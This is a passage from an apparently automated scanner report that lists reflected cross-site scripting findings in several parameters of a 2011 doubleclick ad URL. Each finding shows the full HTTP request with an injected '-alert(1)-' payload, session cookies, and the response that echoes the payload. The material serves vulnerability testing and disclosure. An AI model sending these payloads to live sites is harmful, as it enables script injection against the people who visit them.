This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=22b324'-alert(1)-'1aa36b96c8d&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
3B0%3B61499020%3B4307-300/250%3B41885690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=22b324'-alert(1)-'1aa36b96c8d&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&p
...[SNIP]...

3.141. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [p parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74e14"-alert(1)-"d476ec4b721 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=274e14"-alert(1)-"d476ec4b721&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:05 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
3B0%3B61499020%3B4307-300/250%3B41885690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=274e14"-alert(1)-"d476ec4b721&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&p
...[SNIP]...

3.142. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pdom parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d8f4'-alert(1)-'4276b68460c was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com7d8f4'-alert(1)-'4276b68460c&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
0686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com7d8f4'-alert(1)-'4276b68460c&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.143. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pdom parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f831a"-alert(1)-"fd41ddc67fd was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.comf831a"-alert(1)-"fd41ddc67fd&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
0686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.comf831a"-alert(1)-"fd41ddc67fd&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";
this.type = type;
this.uniqueId =
...[SNIP]...

3.144. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cbc0"-alert(1)-"ba0ac0d227c was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY6cbc0"-alert(1)-"ba0ac0d227c&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
1&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY6cbc0"-alert(1)-"ba0ac0d227c&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";
this.type = type;
this.uniqueId = plcrInfo_1303848426617.uniqueId;
this.thirdPartyI
...[SNIP]...

3.145. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pg parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ec98'-alert(1)-'6c46995427c was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY6ec98'-alert(1)-'6c46995427c&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
1&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY6ec98'-alert(1)-'6c46995427c&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.146. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c129e'-alert(1)-'a18cc8e1ddf was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=c129e'-alert(1)-'a18cc8e1ddf&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54539

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=c129e'-alert(1)-'a18cc8e1ddf&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.2
...[SNIP]...

3.147. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49479"-alert(1)-"b2ea1892855 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=49479"-alert(1)-"b2ea1892855&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54536

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=49479"-alert(1)-"b2ea1892855&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.2
...[SNIP]...

3.148. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3537'-alert(1)-'9e6d81f8f7a was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100f3537'-alert(1)-'9e6d81f8f7a&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
kv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100f3537'-alert(1)-'9e6d81f8f7a&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/htt
...[SNIP]...

3.149. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [pp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f493"-alert(1)-"02b8d42dafa was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=1009f493"-alert(1)-"02b8d42dafa&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:18:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54542

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
kv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=1009f493"-alert(1)-"02b8d42dafa&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";

...[SNIP]...

3.150. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [ppartner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9df1a'-alert(1)-'d8d0b082069 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

